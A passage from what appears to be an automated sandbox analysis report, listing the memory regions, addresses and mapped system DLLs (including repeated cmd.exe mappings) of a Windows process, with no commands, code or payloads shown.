"c:\\windows\\system32\\rpcss.dll") Region: id = 9707 start_va = 0x18a0000 end_va = 0x18fbfff entry_point = 0x18a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 9708 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9709 start_va = 0x18a0000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 9710 start_va = 0x18a0000 end_va = 0x197efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018a0000" filename = "" Region: id = 9711 start_va = 0x1a40000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 9712 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 9713 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 9714 start_va = 0x14b0000 end_va = 0x14b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 9715 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9716 start_va = 0x14c0000 end_va = 0x14c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 9717 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" 
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 9718 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x1980000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 9719 start_va = 0x1990000 end_va = 0x1991fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001990000" filename = "" Region: id = 9720 start_va = 0x1a80000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 9721 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9722 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 9723 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 9724 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 9725 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 9726 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file 
name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 9727 start_va = 0x1980000 end_va = 0x1983fff entry_point = 0x1980000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 9728 start_va = 0x1b80000 end_va = 0x1f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 9758 start_va = 0x19a0000 end_va = 0x19befff entry_point = 0x19a0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 9791 start_va = 0x19c0000 end_va = 0x19c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019c0000" filename = "" Region: id = 9792 start_va = 0x1f80000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 9793 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9794 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9795 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9796 start_va = 0x2080000 end_va = 0x2180fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9797 start_va = 
0x6f580000 end_va = 0x6f588fff entry_point = 0x6f580000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 9836 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 9854 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9855 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 9856 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 9857 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9858 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 9859 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9860 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9861 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9862 start_va = 0x1980000 end_va = 0x1980fff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9863 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9864 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9865 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9866 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9867 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9868 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9869 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 9870 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10351 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10352 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10353 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10354 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 10355 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10356 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10357 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10358 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10359 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10360 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10361 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10362 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10672 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10673 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10674 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10675 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 10676 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10677 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10678 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10679 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10680 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10681 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10682 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 10683 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11109 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11110 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11111 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11112 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11113 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11114 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11115 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11116 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11117 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11118 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11119 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11120 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11546 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11547 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11548 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11549 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11554 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11901 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 11902 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11903 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11904 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11905 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 11906 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11907 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11908 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11909 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11910 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11911 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 11912 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12474 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 12475 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12476 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12477 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12478 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 12479 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12480 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12481 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12482 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12483 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12484 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12485 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12795 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 12796 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12797 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12798 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12799 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12800 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12801 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12802 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12803 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12804 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12805 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 12806 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13116 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 13117 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13118 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13119 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13120 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13121 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13122 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13123 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13124 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13125 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13126 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13127 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13553 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 13554 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13558 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 13559 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13560 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13561 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13562 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13563 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 13564 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14447 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 14448 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14449 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14450 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14451 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14452 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 14453 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14454 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14455 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14456 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14457 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 14458 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16609 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 16610 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16611 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16612 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16613 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16614 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16615 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16616 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16617 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16618 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16619 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 16620 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17126 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" 